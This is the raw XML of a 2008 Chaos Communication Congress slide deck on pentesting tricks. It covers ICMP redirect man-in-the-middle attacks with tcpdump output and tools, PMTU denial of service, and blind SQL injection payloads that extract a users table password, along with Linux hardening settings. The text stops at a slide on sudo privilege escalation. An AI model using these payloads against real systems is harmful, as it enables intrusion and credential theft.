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subtitle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474cm"/>
    </style:style>
    <style:style style:name="pr8" style:family="presentation" style:parent-style-name="Default-subtitle">
      <style:graphic-properties draw:fill-color="#ffffff" fo:min-height="16.389cm"/>
    </style:style>
    <style:style style:name="pr9" style:family="presentation" style:parent-style-name="Default-subtitle">
      <style:graphic-properties draw:fill-color="#ffffff" fo:min-height="16.564cm"/>
    </style:style>
    <style:style style:name="pr10" style:family="presentation" style:parent-style-name="Default-title">
      <style:graphic-properties draw:fill-color="#ffffff" draw:auto-grow-height="true" fo:min-height="3.507cm"/>
    </style:style>
    <style:style style:name="pr11" style:family="presentation" style:parent-style-name="Default-subtitle">
      <style:graphic-properties draw:fill-color="#ffffff" draw:auto-grow-height="true" fo:min-height="13.86cm"/>
    </style:style>
    <style:style style:name="pr12" style:family="presentation" style:parent-style-name="Default-subtitle">
      <style:graphic-properties draw:fill-color="#ffffff" fo:min-height="19.101cm"/>
    </style:style>
    <style:style style:name="pr13" style:family="presentation" style:parent-style-name="Default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text-align="start" fo:text-indent="0cm"/>
      <style:text-properties fo:font-size="32pt"/>
    </style:style>
    <style:style style:name="P9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8pt" style:font-size-asian="18pt" style:font-size-complex="18pt"/>
    </style:style>
    <style:style style:name="P10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0pt" style:font-size-asian="20pt" style:font-size-complex="20pt"/>
    </style:style>
    <style:style style:name="P11" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="start" fo:text-indent="0cm"/>
      <style:text-properties fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="P12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4pt" fo:font-weight="bold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/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties fo:color="#c5000b" fo:font-size="32pt"/>
    </style:style>
    <style:style style:name="T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c5000b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urier New'" style:font-family-generic="modern" style:font-pitch="fixed"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20pt" style:font-size-asian="20pt" style:font-size-complex="20pt"/>
    </style:style>
    <style:style style:name="T8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c5000b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use-window-font-color="true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family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="32pt" fo:font-weight="bold" style:font-size-asian="20pt" style:font-weight-asian="bold" style:font-size-complex="20pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="T12" style:family="text">
      <style:text-properties fo:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="18pt" fo:font-weight="bold" style:font-size-asian="20pt" style:font-weight-asian="bold" style:font-size-complex="20pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="T13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c5000b" fo:font-size="32pt" style:text-underline-style="none" fo:font-weight="normal" style:font-size-asian="32pt" style:font-weight-asian="normal" style:font-size-complex="32pt" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="T19" style:family="text">
      <style:text-properties fo:color="#c5000b" fo:font-size="20pt" style:font-size-asian="20pt" style:font-size-complex="20pt"/>
    </style:style>
    <style:style style:name="T20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21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family="Arial" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="32pt" style:font-size-asian="18pt" style:font-size-complex="18pt"/>
    </style:style>
    <style:style style:name="T23" style:family="text">
      <style:text-properties fo:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="18pt" style:font-size-asian="18pt" style:font-size-complex="18pt"/>
    </style:style>
    <style:style style:name="T24" style:family="text">
      <style:text-properties fo:color="#dc2300" fo:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="18pt" fo:font-weight="bold" style:font-size-asian="18pt" style:font-size-complex="18pt"/>
    </style:style>
    <style:style style:name="T25" style:family="text">
      <style:text-properties fo:color="#dc2300"/>
    </style:style>
    <style:style style:name="T26" style:family="text">
      <style:text-properties fo:font-size="30pt" style:font-size-asian="30pt" style:font-size-complex="30pt"/>
    </style:style>
    <style:style style:name="T27" style:family="text">
      <style:text-properties style:use-window-font-color="true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family="Arial" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="26pt" style:font-size-asian="26pt" style:font-size-complex="26pt"/>
    </style:style>
    <style:style style:name="T29" style:family="text">
      <style:text-properties style:use-window-font-color="true"/>
    </style:style>
    <style:style style:name="T30" style:family="text">
      <style:text-properties fo:color="#ffffff"/>
    </style:style>
    <style:style style:name="T31" style:family="text">
      <style:text-properties fo:font-family="'Courier 10 Pitch'" style:font-pitch="fixed" fo:font-size="32pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T32" style:family="text">
      <style:text-properties fo:color="#dc2300" fo:font-family="'Courier 10 Pitch'" style:font-pitch="fixed" fo:font-size="32pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T33" style:family="text">
      <style:text-properties fo:color="#dc2300" fo:font-size="32pt"/>
    </style:style>
    <style:style style:name="T34" style:family="text">
      <style:text-properties fo:font-family="'Courier 10 Pitch'" style:font-pitch="fixed" fo:font-size="22pt" fo:font-weight="bold" style:font-size-asian="26pt" style:font-size-complex="26pt"/>
    </style:style>
    <style:style style:name="T35" style:family="text">
      <style:text-properties fo:color="#c5000b" fo:font-family="'Courier 10 Pitch'" style:font-pitch="fixed" fo:font-size="22pt" fo:font-weight="bold" style:font-size-asian="26pt" style:font-size-complex="26pt"/>
    </style:style>
    <style:style style:name="T36" style:family="text">
      <style:text-properties fo:font-family="'Courier 10 Pitch'" style:font-pitch="fixed" fo:font-size="22pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T37" style:family="text">
      <style:text-properties fo:color="#c5000b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family="'Courier 10 Pitch'" style:font-pitch="fixed" fo:font-size="20pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T40" style:family="text">
      <style:text-properties fo:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="14pt" fo:font-weight="bold" style:font-size-asian="14pt" style:font-size-complex="14pt"/>
    </style:style>
    <style:style style:name="T41" style:family="text">
      <style:text-properties fo:color="#dc2300" fo:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="14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5.199cm" svg:height="7.079cm" svg:x="1.401cm" svg:y="-0.94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 </text:span><text:span text:style-name="T1">25th Chaos Communication Congress - Nothing to hide</text:span> <text:line-break/><text:line-break/>Tricks: makes you smile</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="13.609cm" svg:x="1.401cm" svg:y="5.039cm">
          <draw:text-box>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">A clever or ingenious device or expedient; adroit technique: the tricks of the trade.</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">(c) cc-by-nc-nd-2.0 - ush team 2008</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">Francesco `ascii` Ongaro &lt;ascii@ush.it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4" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="7.079cm" svg:x="1.399cm" svg:y="-0.94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 </text:span><text:span text:style-name="T1">25th Chaos Communication Congress - Nothing to hide</text:span> <text:line-break/><text:line-break/>Tricks: makes you smile</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="13.613cm" svg:x="1.399cm" svg:y="5.04cm" presentation:class="subtitle">
          <draw:text-box>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">A collection of engaging techniques, some unreleased and some perhaps forgotten, to make pentesting fun again. From layer 3 attacks that still work, to user interaction based exploits that aren't 'clickjacking', to local root privilege escalation without exploits and uncommon web application exploitation techniques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7" draw:text-style-name="P3" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.779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8" draw:text-style-name="P5" draw:layer="layout" svg:width="25.191cm" svg:height="16.389cm" svg:x="1.399cm" svg:y="3.652cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2">An ICMP redirect is a router's way of communicating that </text:span><text:span text:style-name="T3">there is a better path</text:span><text:span text:style-name="T2"> out of this network or into another one than the one the host had chosen.</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"># echo test | nc 192.168.98.82 22</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"># tcpdump -nneqti eth0</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">C </text:span><text:span text:style-name="T5">G1</text:span><text:span text:style-name="T4"> 192.168.99.35.54510 &gt; 192.168.98.82.22: tcp 0 (DF)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T5">G1</text:span><text:span text:style-name="T4"> C 192.168.99.254 &gt; 192.168.99.35: </text:span><text:span text:style-name="T5">icmp: redirect 192.168.98.82 to host 192.168.99.1</text:span><text:span text:style-name="T4"> [tos 0xc0] </text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">C </text:span><text:span text:style-name="T5">G2</text:span><text:span text:style-name="T4"> 192.168.99.35.54510 &gt; 192.168.98.82.22: tcp 0 (DF)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T6"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T7">http://linux-ip.net/html/routing-icmp.ht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4" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.778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5" draw:text-style-name="P7" draw:layer="layout" svg:width="27.305cm" svg:height="16.01cm" svg:x="0.635cm" svg:y="3.842cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box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RFC </text:span><text:span text:style-name="T9">792</text:span><text:span text:style-name="T10">:</text:span><text:span text:style-name="T8"> “Out of band” ICMP Redirect Message:</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T11"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T11"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12"><text:s/></text:span><text:span text:style-name="T12">0 <text:s text:c="18"/>1 <text:s text:c="18"/>2 <text:s text:c="18"/>3 <text:s/></text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12"><text:s/></text:span><text:span text:style-name="T12">0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">.---------------.---------------.-------------------------------.</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">| <text:s text:c="4"/>Type <text:s text:c="5"/>| <text:s text:c="4"/>Code <text:s text:c="5"/>| <text:s text:c="9"/>Checksum <text:s text:c="12"/>|</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">|---------------'---------------'-------------------------------|</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">| <text:s text:c="16"/>Gateway Internet Address <text:s text:c="21"/>|</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">|---------------------------------------------------------------|</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">| <text:s text:c="5"/>Internet Header + 64 bits of Original Data Datagram <text:s text:c="5"/>|</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12">'---------------------------------------------------------------'</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T12"/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7" draw:text-style-name="P3" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.779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5" draw:text-style-name="P8" draw:layer="layout" svg:width="25.191cm" svg:height="17.115cm" svg:x="1.399cm" svg:y="3.288cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box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4"><text:span text:style-name="T14">0-7</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">→</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">Type 5</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T14">8-15</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">→</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">Code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0</text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">→ </text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">Redirect for Network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1</text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">→ </text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">Redirect for Host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2</text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">→ </text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">Redirect for Type of Service and Network</text:span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3</text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">→ </text:span><text:span text:style-name="T15"><text:tab/></text:span><text:span text:style-name="T15">Redirect for Type of Service and Host</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T16">16-31</text:span><text:span text:style-name="T16"><text:tab/></text:span><text:span text:style-name="T16">→</text:span><text:span text:style-name="T17"><text:tab/></text:span><text:span text:style-name="T17"><text:tab/></text:span><text:span text:style-name="T14">Header Checksum</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T14">32</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">-61</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">→</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">Gateway IP</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T14">96-127</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14">→</text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T14"><text:tab/></text:span><text:span text:style-name="T18">IP Header + 8Byte Original Datagram</text:span><text:span text:style-name="T14"> </text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T14"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T1">http://en.wikipedia.org/wiki/ICMP_Redirect_Message</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T1">http://tools.ietf.org/html/rfc792 page 12</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T1">http://tools.ietf.org/html/rfc11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frame presentation:style-name="pr7" draw:text-style-name="P3" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.779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9" draw:text-style-name="P8" draw:layer="layout" svg:width="25.191cm" svg:height="16.564cm" svg:x="1.399cm" svg:y="3.565cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P3"><text:span text:style-name="T2">- (Low cost, layer 3) DoS and </text:span><text:span text:style-name="T3">MITM</text:span><text:span text:style-name="T2">.</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T1">http://insecure.org/sploits/arp.games.html </text:span><text:span text:style-name="T19">1997</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2">- </text:span><text:span text:style-name="T3">Secure redirects</text:span><text:span text:style-name="T2"> → only accept ICMP redirects for gateways listed in the default gateway list.</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T1">http://www.security.iitk.ac.in/contents/workshops/iitkhack04/keynotes/ppt06.ppt </text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T1">http://alor.antifork.org/talks/MITM-attacks.ppt (2002 VS 2004, LOL!)</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2">- “Old” OS = no secure_redirects at all.</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2">- Not showed in some userspace tools</text:span><text:span text:style-name="T1"> (</text:span><text:span text:style-name="T19">route</text:span><text:span text:style-name="T1"> -n).</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T2">- Routing cache </text:span><text:span text:style-name="T1">(ip route/ip route get 123/ip route flush cache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draw:frame presentation:style-name="pr4" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.778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5" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="14.536cm" svg:x="1.399cm" svg:y="4.579cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T8">Tools:</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T8">- </text:span><text:span text:style-name="T9">hping3</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">ICMP</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"><text:s text:c="2"/></text:span><text:span text:style-name="T20">-C <text:s/>--icmptype <text:s text:c="2"/>icmp type (default echo request)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"><text:s text:c="2"/></text:span><text:span text:style-name="T20">-K <text:s/>--icmpcode <text:s text:c="2"/>icmp code (default 0)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"><text:s text:c="6"/></text:span><text:span text:style-name="T20">--force-icmp send all icmp types</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"><text:s text:c="6"/></text:span><text:span text:style-name="T20">--icmp-gw <text:s text:c="3"/>set gateway address for ICMP redirect</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">Common</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"><text:s text:c="2"/></text:span><text:span text:style-name="T20">-d <text:s/>--data <text:s text:c="6"/>data size <text:s text:c="19"/>(default is 0)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"><text:s text:c="2"/></text:span><text:span text:style-name="T20">-E <text:s/>--file <text:s text:c="6"/>data from file</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T8">- </text:span><text:span text:style-name="T9">scapy</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T8">- </text:span><text:span text:style-name="T9">irpas</text:span><text:span text:style-name="T8"> </text:span><text:span text:style-name="T21">http://www.phenoelit-us.org/irpas/</text:span><text:span text:style-name="T8"> </text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T8">- icmp_redir.c </text:span><text:span text:style-name="T21">http://www.uinc.ru/articles/21/icmp_redir.c </text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T8">- netwag </text:span><text:span text:style-name="T21">http://www.laurentconstantin.com/en/netw/netwag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frame presentation:style-name="pr7" draw:text-style-name="P3" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.779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5" draw:text-style-name="P9" draw:layer="layout" svg:width="25.191cm" svg:height="19.695cm" svg:x="1.399cm" svg:y="1.999cm" presentation:class="subtitle" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P3"><text:span text:style-name="T22"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T22"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T22">Remediation plan:</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T22">- Firewalling.</text:span></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T22"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T22">- Network stack tuning.</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T23"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">/proc/sys/net/ipv4/conf/all/</text:span><text:span text:style-name="T24">accept_redirects</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">/proc/sys/net/ipv4/conf/all/secure_redirects</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">/proc/sys/net/ipv4/conf/all/send_redirects</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">/proc/sys/net/ipv4/conf/default/</text:span><text:span text:style-name="T24">accept_redirects</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">/proc/sys/net/ipv4/conf/default/secure_redirects</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">/proc/sys/net/ipv4/conf/default/send_redirects</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">net.ipv4.conf.all.accept_redirects = 0</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">net.ipv4.conf.all.secure_redirects = 1</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">net.ipv4.conf.all.send_redirects = 0</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">net.ipv4.conf.default.accept_redirects = 0</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">net.ipv4.conf.default.secure_redirects = 1</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20">net.ipv4.conf.default.send_redirects = 0</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T20"/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4" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P3">Netphun: ICMP redirect<text:line-break/>(l3attacks that works)</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="13.613cm" svg:x="1.399cm" svg:y="5.04cm" presentation:class="subtitle">
          <draw:text-box>
            <text:p text:style-name="P1">Remediation 2: Switch to IBM AS/400 (-;</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1">For courious people:</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"><text:span text:style-name="T25">net/ipv4/icmp.c</text:span> → static void icmp_redirect()</text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1">static const struct icmp_control icmp_pointers[NR_ICMP_TYPES + 1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7" draw:text-style-name="P3" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.779cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P3">Netfun: ICMP PMTU DoS<text:line-break/>(l3attacks that works)</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P5" draw:layer="layout" svg:width="25.191cm" svg:height="13.613cm" svg:x="1.399cm" svg:y="5.04cm" presentation:class="subtitle">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T3">Max MTU of the “Path”</text:span><text:span text:style-name="T2"> (route) is dinamically calculated by error ICMP packets.</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">- 64 bytes packets?</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">- Solaris min. MTU = 512 → antirez lkm.</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1">http://archives.neohapsis.com/archives/bugtraq/2001-01/0231.html </text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T1"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T26">- /proc/sys/net/ipv4/ip_no_pmtu_disc ... reall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draw:frame presentation:style-name="pr10" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.402cm" svg:y="0.78cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">Blind SQLi: Mappable method<text:line-break/>cause blind hurts too</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr11" draw:text-style-name="P10" draw:layer="layout" svg:width="25.199cm" svg:height="14.204cm" svg:x="1.402cm" svg:y="5.444cm">
          <draw:text-box>
            <text:p text:style-name="P4"><text:span text:style-name="T4">`news` table</text:span><text:span text:style-name="T4"><text:tab/></text:span><text:span text:style-name="T4"><text:tab/></text:span><text:span text:style-name="T4"><text:tab/></text:span><text:span text:style-name="T4">id|real_id|data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 |348 <text:s text:c="3"/>|Bomb news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 |349 <text:s text:c="3"/>|Sex news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7 |391 <text:s text:c="3"/>|Antrax news</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">`users` table</text:span><text:span text:style-name="T4"><text:tab/></text:span><text:span text:style-name="T4"><text:tab/></text:span><text:span text:style-name="T4">id|username|password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 |Admin <text:s text:c="2"/>|h£((B0y</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">news.jsp?reference=123 &lt;-- SQLi</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">news.jsp?reference=' AND 1=0 OR 1=1 &lt;-- first news</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">news.jsp?reference=' AND 1=0 OR 1=0 &lt;-- news not found</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4"/></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T4">news.jsp?reference=' AND 1=0 OR </text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T5">case(</text:span><text:span text:style-name="T4">first_char((select password from `users`))</text:span><text:span text:style-name="T5">)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T5">when(</text:span><text:span text:style-name="T27">1</text:span><text:span text:style-name="T5">)then(</text:span><text:span text:style-name="T27">1</text:span><text:span text:style-name="T5">)when(</text:span><text:span text:style-name="T27">2</text:span><text:span text:style-name="T5">)then(</text:span><text:span text:style-name="T27">3</text:span><text:span text:style-name="T5">)when(</text:span><text:span text:style-name="T27">3</text:span><text:span text:style-name="T5">)then(</text:span><text:span text:style-name="T27">7</text:span><text:span text:style-name="T5">)</text:span></text:p>
            <text:p text:style-name="P4"><text:span text:style-name="T6"/></text:p>
            <text:p text:style-name="P3"><text:span text:style-name="T28">IT'S MAGIC!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frame presentation:style-name="pr10" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.402cm" svg:y="0.78cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">Blind SQLi: Mappable method<text:line-break/>CHARMAP tool</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr11" draw:text-style-name="P5" draw:layer="layout" svg:width="25.199cm" svg:height="13.86cm" svg:x="1.402cm" svg:y="4.916cm">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T3">CHARMAP</text:span><text:span text:style-name="T2"> is a tool developed with the aim to implement data fetching using the technique exposed by </text:span><text:span text:style-name="T3">Wisec</text:span><text:span text:style-name="T2">, </text:span><text:span text:style-name="T3">Mappable Blind SQL Injections</text:span><text:span text:style-name="T2">, in a generic way.</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">http://www.ush.it/team/ascii/hack-charmap/</text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">http://www.ush.it/team/ascii/hack-charmap/charmap_0.1.tar.gz </text:span></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2"/></text:p>
            <text:p text:style-name="P1"><text:span text:style-name="T2">→ </text:span><text:span text:style-name="T2">WTFPL v2 ←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4" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="3.625cm" svg:x="1.399cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">Blind SQLi: Mappable method<text:line-break/>CHARMAP demo</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P1" draw:layer="layout" svg:width="25.191cm" svg:height="13.613cm" svg:x="1.399cm" svg:y="5.04cm" presentation:class="subtitle">
          <draw:text-box>
            <text:p text:style-name="P1"><text:span text:style-name="T2">DEMO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presentation:style-name="pr1" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="3.625cm" svg:x="1.401cm" svg:y="0.778cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P1">User iteraction madness:<text:line-break/>macos/sudo local kit</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr2" draw:text-style-name="P1" draw:layer="layout" svg:width="25.199cm" svg:height="13.609cm" svg:x="1.401cm" svg:y="5.039cm">
          <draw:text-box>
            <text:p text:style-name="P1">Default sudo setup = backdoor:</text:p>
            <text:p text:style-name="P1"/>
            <text:p text:style-name="P1"/>
